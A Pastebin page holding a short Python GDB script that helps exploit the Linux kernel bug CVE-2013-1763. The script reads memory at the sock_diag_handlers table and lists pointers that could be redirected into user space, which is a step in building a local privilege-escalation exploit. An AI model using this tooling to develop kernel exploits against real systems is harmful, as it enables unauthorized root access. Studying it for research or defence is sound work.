Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- '''
- Automatic vector finder for CVE-2013-1763
- just feed it the address of sock_diag_handlers ( for count 256 is fine )
- ocean ### https://twitter.com/_ocean
- '''
- import struct
- import subprocess
- import re
- import sys
- import os
- import gdb
- def find_location(base,count):
- # define user space upper limit
- allf = 0xFFFFFFFF # be sure we do everything unsigned!
- mmap_min_addr = 4096
- ul = int("0xBF000000",16)
- try:
- # try to read memory so we get a table of possible pointers
- buffer = gdb.inferiors()[0].read_memory(base, count*4)
- for i in range(1,count):
- # better if we find a suitable pointer in Kspace
- t= struct.unpack('<I',buffer[i*4:i*4+4])[0]
- #print t
- try:
- if t&allf> ul&allf:
- t1 = gdb.inferiors()[0].read_memory(t, 4)
- t2 = gdb.inferiors()[0].read_memory(t+4, 4)
- t1 = struct.unpack('<I', t1)[0]
- t2 = struct.unpack('<I', t2)[0]
- if t2&allf >= mmap_min_addr&allf and t2&allf < ul&allf:
- print "["+hex(i)+"] "+hex(base+i*4)+" = "+hex(t1)+"\t"+hex(t2)
- elif t&allf >= mmap_min_addr&allf and t&allf < ul&allf :
- print "possible location in uspace ["+hex(i)+"] "+hex(base+i*4)+" = "+hex(t)
- except gdb.MemoryError as e:
- # it's not a good pointer
- continue
- return True
- except Exception as e:
- print e
- return False
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement